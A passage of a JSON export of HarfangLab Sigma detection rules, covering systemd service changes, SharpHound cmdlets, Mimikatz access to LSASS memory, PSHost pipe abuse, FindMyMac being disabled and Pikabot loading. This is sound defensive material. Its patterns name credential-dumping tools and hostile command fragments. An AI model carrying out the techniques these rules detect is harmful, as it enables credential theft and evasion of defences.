/usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf '\n - '/usr/bin/python* /usr/bin/dnf '\n - 'dnf upgrade --refresh'\n - 'dnf upgrade -y --refresh'\n - '/usr/bin/python* /usr/bin/dnf-3 '\n - '/usr/bin/dnf5 --installroot '\n - '/usr/bin/dnf5 builddep --installroot '\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf-automatic '\n - '/usr/bin/python* /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf '\n - '/usr/bin/python* /usr/bin/dnf '\n - 'dnf upgrade --refresh'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf-automatic '\n - '/usr/bin/python* /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf '\n - '/usr/bin/python* /usr/bin/dnf '\n - 'dnf upgrade --refresh'\n\n exclusion_tdnf:\n ProcessImage: '/usr/bin/tdnf'\n\n exclusion_rpm:\n - ProcessImage: '/usr/bin/rpm'\n - ProcessParentImage: '/usr/bin/rpm'\n - ProcessAncestors|contains: '|/usr/bin/rpm|'\n - ProcessGrandparentCommandLine: '/bin/sh /var/tmp/rpm-tmp.?????? ?'\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_snapd:\n ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/libexec/snapd/snapd'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_ansible_path:\n Path|contains: '/.ansible/tmp/ansible-tmp-'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/usr/bin/conman-server'\n - ProcessAncestors|contains:\n - '/usr/bin/dockerd'\n - '/usr/bin/containerd-shim'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_eset:\n # rm /etc/systemd/system/eraagent.service\n # mv ./setup/systemd.service /etc/systemd/system/eraagent.service\n ProcessCommandLine|endswith: ' /etc/systemd/system/eraagent.service'\n ProcessCurrentDirectory: '/opt/eset/RemoteAdministrator/Agent/'\n\n exclusion_dracut:\n ProcessParentCommandLine|startswith:\n - '/bin/bash -p /bin/dracut '\n - '/bin/bash -p /usr/bin/dracut '\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /opt/f-secure/'\n\n exclusion_rubycat:\n ProcessGrandparentCommandLine|startswith: '/usr/bin/rubycat-skuldserver -c '\n\n exclusion_swengine:\n ProcessGrandparentImage: '/usr/bin/sw-engine'\n\n exclusion_qemu:\n ProcessImage: '/usr/bin/qemu-*-static'\n ProcessParentImage: '/usr/bin/qemu-*-static'\n\n exclusion_waagent:\n ProcessCommandLine|startswith:\n - 'python* -u /usr/sbin/waagent -run-exthandlers'\n - '/usr/bin/python* /var/lib/waagent/Microsoft.CPlat.Core.LinuxPatchExtension-*/MsftLinuxPatchCore.py '\n - '/usr/libexec/platform-python* /var/lib/waagent/Microsoft.CPlat.Core.LinuxPatchExtension-*/MsftLinuxPatchCore.py '\n - '/usr/bin/python* /var/lib/waagent/Microsoft.Azure.Monitor.AzureMonitorLinuxAgent-*/agent.py '\n - '/usr/libexec/platform-python* /var/lib/waagent/Microsoft.Azure.Monitor.AzureMonitorLinuxAgent-*/agent.py '\n\n exclusion_qradar:\n ProcessCommandLine: '/bin/bash /opt/qradar/bin/apply_tunings.sh'\n\n exclusion_vbox:\n ProcessCommandLine: '/bin/sh /sbin/vboxconfig'\n\n exclusion_temp_file:\n - ProcessImage:\n - '/usr/bin/vi'\n - '/usr/libexec/vi'\n - '/usr/bin/vim'\n - '/usr/bin/vim.nox'\n - '/usr/bin/vim.basic'\n - '/bin/nano'\n - '/usr/bin/nano'\n Path|endswith:\n - '.swp'\n - '.swx'\n - ProcessImage: '/usr/bin/sed'\n Path:\n - '/etc/systemd/system/sed??????'\n - '/etc/systemd/user/sed??????'\n - '/usr/lib/systemd/system/sed??????'\n - '/usr/lib/systemd/user/sed??????'\n - '/root/.config/systemd/system/sed??????'\n - '/root/.config/systemd/user/sed??????'\n - '/home/*/.config/systemd/system/sed??????'\n - '/home/*/.config/systemd/user/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath:\n - '/etc/systemd/system/sed??????'\n - '/etc/systemd/user/sed??????'\n - '/usr/lib/systemd/system/sed??????'\n - '/usr/lib/systemd/user/sed??????'\n - '/root/.config/systemd/system/sed??????'\n - '/root/.config/systemd/user/sed??????'\n - '/home/*/.config/systemd/system/sed??????'\n - '/home/*/.config/systemd/user/sed??????'\n\n exclusion_buildah:\n ProcessCommandLine|startswith: 'storage-untar / /'\n\n exclusion_commvault:\n ProcessParentImage: '/opt/commvault*/Base64/cvflock'\n\n exclusion_install:\n ProcessImage: '/usr/bin/install'\n Path:\n - '/etc/systemd/system/vpnagentd.service'\n - '/usr/lib/systemd/system/netdata.service'\n\n exclusion_proxmox:\n ProcessCommandLine|startswith: '/usr/bin/perl -T /usr/sbin/pct '\n\n exclusion_sap:\n ProcessParentImage: '/usr/sap/hostctrl/exe/saphostexec'\n\n exclusion_image:\n ProcessImage:\n - '/usr/lib/systemd/system-generators/systemd-fstab-generator'\n - '/usr/bin/rsync'\n - '/usr/bin/cpio'\n - '/opt/puppetlabs/puppet/bin/ruby'\n - '/usr/bin/podman'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/usr/bin/crio'\n - '/usr/local/manageengine/uems_agent/bin/dcservice'\n - '/kaniko/executor'\n - '/usr/bin/elemental'\n - '/opt/gitlab/embedded/bin/ruby'\n - '/usr/bin/gitlab-runner'\n - '/usr/libexec/packagekitd'\n - '/usr/bin/unzip'\n - '/usr/bin/update-alternatives'\n - '/nix/store/*-coreutils-*/bin/coreutils'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/opt/GC_Ext/GC/gc_linux_service|'\n - '|/opt/bladelogic/*/NSH/bin/rscd_full|'\n - '|/opt/bmc/bladelogic/RSCD/sbin/bldeploy|'\n - '|/opt/.gxsetup/silent_install/install|'\n - '|/usr/bin/lxc-start|'\n - '|/opt/psa/admin/sbin/php_handlers_control|'\n - '|/usr/NX/bin/nxpost|'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "57aa6d3a-cc08-4dc5-be27-c028af95a27d",
"rule_name": "SystemD Service File Created or Modified",
"rule_description": "Detects when a systemd service file is created or modified.\nAdversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence.\nIt is recommended to verify the content of the service file and the process that modified it.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1037",
"attack.t1543.002",
"attack.t1547"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "57c8c811-d9b6-430d-86bd-dbefad0c243b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085137Z",
"creation_date": "2026-03-23T11:45:34.085139Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085143Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BloodHoundAD/SharpHound",
"https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1",
"https://attack.mitre.org/software/S0521/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_sharphound.yml",
"content": "title: Malicious PowerShell SharpHound Commandlet\nid: 57c8c811-d9b6-430d-86bd-dbefad0c243b\ndescription: |\n Detects malicious commandlets related to SharpHound, the data ingestor of BloodHound.\n This tool allows an attacker to do reconnaissance on an Active Directory and possibly reveal hidden relationships to perform and identify attacks within an AD environment.\n It is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\nreferences:\n - https://github.com/BloodHoundAD/SharpHound\n - https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1\n - https://attack.mitre.org/software/S0521/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/07/19\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.discovery\n - attack.t1482\n - attack.t1615\n - attack.t1201\n - attack.t1069.001\n - attack.t1069.002\n - attack.t1018\n - attack.t1033\n - attack.s0521\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.SharpHound\n - classification.Windows.HackTool.BloodHound\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Invoke-BloodHound'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "57c8c811-d9b6-430d-86bd-dbefad0c243b",
"rule_name": "Malicious PowerShell SharpHound Commandlet",
"rule_description": "Detects malicious commandlets related to SharpHound, the data ingestor of BloodHound.\nThis tool allows an attacker to do reconnaissance on an Active Directory and possibly reveal hidden relationships to perform and identify attacks within an AD environment.\nIt is recommended to investigate the PowerShell command as well as other malicious commands executed on the host to determine legitimacy.\n",
"rule_creation_date": "2022-07-19",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1033",
"attack.t1059.001",
"attack.t1069.001",
"attack.t1069.002",
"attack.t1201",
"attack.t1482",
"attack.t1615"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "57cf175a-4dbb-48e9-8aa8-8c6ed98c31e0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085680Z",
"creation_date": "2026-03-23T11:45:34.085681Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085686Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://threathunterplaybook.com/library/windows/mimikatz_openprocess_modules.html",
"https://github.com/gentilkiwi/mimikatz/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_process_memory_access_mimikatz.yml",
"content": "title: LSASS Process Memory Accessed via Mimikatz\nid: 57cf175a-4dbb-48e9-8aa8-8c6ed98c31e0\ndescription: |\n Detects an attempt to open LSASS.exe process memory by the Mimikatz binary.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to isolate affected systems, terminate unauthorized processes accessing LSASS memory, and conduct memory forensics to identify compromised credentials.\nreferences:\n - https://threathunterplaybook.com/library/windows/mimikatz_openprocess_modules.html\n - https://github.com/gentilkiwi/mimikatz/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/14\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection_base:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccess:\n - '0x1010'\n - '0x1410'\n selection_mimikatz_binary:\n - ProcessInternalName: 'mimikatz'\n - ProcessOriginalFileName: 'mimikatz.exe'\n\n condition: all of selection_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "57cf175a-4dbb-48e9-8aa8-8c6ed98c31e0",
"rule_name": "LSASS Process Memory Accessed via Mimikatz",
"rule_description": "Detects an attempt to open LSASS.exe process memory by the Mimikatz binary.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to isolate affected systems, terminate unauthorized processes accessing LSASS memory, and conduct memory forensics to identify compromised credentials.\n",
"rule_creation_date": "2021-06-14",
"rule_modified_date": "2025-01-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "585e591d-d328-427f-828f-53a20bee6a27",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609174Z",
"creation_date": "2026-03-23T11:45:34.609178Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609185Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://x.com/staatsgeheim/status/1868032068892184639",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001pshost_pipe_connect.yml",
"content": "title: Suspicious Connection to PSHost Named Pipe\nid: 585e591d-d328-427f-828f-53a20bee6a27\ndescription: |\n Detects connections to the PSHost named pipe which enables PowerShell command execution within specific process contexts.\n The PSHost named pipe facilitates inter-process communication for PowerShell's Enter-PSHostProcess functionality, allowing commands to run within target processes.\n Attackers can abuse this mechanism to inject malicious code into legitimate processes, escalate privileges, or evade detection by masquerading malicious activities as trusted process behavior.\n It is recommended to investigate the connecting processes, review executed PowerShell commands, verify user account legitimacy, and check for suspicious activities following the pipe connection.\nreferences:\n - https://x.com/staatsgeheim/status/1868032068892184639\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/12/17\nmodified: 2025/06/18\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: named_pipe_connection\n product: windows\ndetection:\n selection:\n PipeName|startswith: '\\PSHost.'\n\n exclusion_powershell:\n Image:\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Windows\\Syswow64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Windows\\System32\\wsmprovhost.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_anssi_audittool:\n ProcessOriginalFileName: 'audit_tool.exe'\n ProcessSigned: 'true'\n ProcessSignature: \"Agence Nationale de la Sécurité des Systèmes d'Information\"\n\n exclusion_psscriptpad:\n ProcessOriginalFileName: 'PSScriptPad.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ironman Software LLC'\n\n exclusion_code:\n Image: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n ProcessParentImage|endswith: '\\code.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "585e591d-d328-427f-828f-53a20bee6a27",
"rule_name": "Suspicious Connection to PSHost Named Pipe",
"rule_description": "Detects connections to the PSHost named pipe which enables PowerShell command execution within specific process contexts.\nThe PSHost named pipe facilitates inter-process communication for PowerShell's Enter-PSHostProcess functionality, allowing commands to run within target processes.\nAttackers can abuse this mechanism to inject malicious code into legitimate processes, escalate privileges, or evade detection by masquerading malicious activities as trusted process behavior.\nIt is recommended to investigate the connecting processes, review executed PowerShell commands, verify user account legitimacy, and check for suspicious activities following the pipe connection.\n",
"rule_creation_date": "2024-12-17",
"rule_modified_date": "2025-06-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "587dc4a6-6be3-43fa-bab1-2589039af85e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616771Z",
"creation_date": "2026-03-23T11:45:34.616775Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616782Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_findmymac_disbaled.yml",
"content": "title: FindMyMac Disabled via plutil\nid: 587dc4a6-6be3-43fa-bab1-2589039af85e\ndescription: |\n Detects the FindMyMac feature being disabled via the plutil command.\n Attackers may disable FindMyMac to prevent the device from being located or wiped remotely.\n It is recommended to check plutil's execution context to look for suspicious processes.\nreferences:\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/07/03\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1562.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Plutil\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base:\n Image: '/usr/bin/plutil'\n CommandLine|contains|all:\n - '-replace FMMEnabled'\n - 'com.apple.findmymac.plist'\n\n selection_disable:\n CommandLine|contains:\n - '-bool NO'\n - 'false'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "587dc4a6-6be3-43fa-bab1-2589039af85e",
"rule_name": "FindMyMac Disabled via plutil",
"rule_description": "Detects the FindMyMac feature being disabled via the plutil command.\nAttackers may disable FindMyMac to prevent the device from being located or wiped remotely.\nIt is recommended to check plutil's execution context to look for suspicious processes.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-01-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5925b010-3ee3-4193-9359-11e728211c13",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084323Z",
"creation_date": "2026-03-23T11:45:34.084326Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084330Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot",
"https://www.zscaler.fr/blogs/security-research/technical-analysis-pikabot",
"https://attack.mitre.org/techniques/T1566/001/"
],
"name": "t1566_001_pikabot.yml",
"content": "title: Pikabot Malware Detected\nid: 5925b010-3ee3-4193-9359-11e728211c13\ndescription: |\n Detects the initial loading of the Pikabot malware.\n Pikabot is, as of 2023, an emerging malware family that comprises a downloader/installer, a loader, and a core backdoor component. It demonstrates advanced techniques in evasion, injection, and anti-analysis.\n It is recommended to analyze files related to this execution as well as to look for signs of persistence and attacker interactive activity.\nreferences:\n - https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot\n - https://www.zscaler.fr/blogs/security-research/technical-analysis-pikabot\n - https://attack.mitre.org/techniques/T1566/001/\ndate: 2023/11/20\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566.001\n - attack.defense_evasion\n - attack.t1497\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Pikabot\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_cmd:\n OriginalFileName: 'cmd.exe'\n CommandLine|contains|all:\n - 'echo'\n - 'curl'\n - 'ping'\n - 'exit'\n\n selection_curl:\n OriginalFileName: 'curl.exe'\n CommandLine|contains: 'AppData\\Local\\Temp\\'\n ParentImage|endswith: '\\cmd.exe'\n ParentCommandLine|contains|all:\n - 'echo'\n - 'curl'\n - 'ping'\n - 'exit'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5925b010-3ee3-4193-9359-11e728211c13",
"rule_name": "Pikabot Malware Detected",
"rule_description": "Detects the initial loading of the Pikabot malware.\nPikabot is, as of 2023, an emerging malware family that comprises a downloader/installer, a loader, and a core backdoor component. It demonstrates advanced techniques in evasion, injection, and anti-analysis.\nIt is recommended to analyze files related to this execution as well as to look for signs of persistence and attacker interactive activity.\n",
"rule_creation_date": "2023-11-20",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1497",
"attack.t1566.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "593ebf84-35d4-42cd-98e9-55d9df5f87a6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598591Z",
"creation_date": "2026-03-23T11:45:34.598594Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598601Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ijplmui.yml",
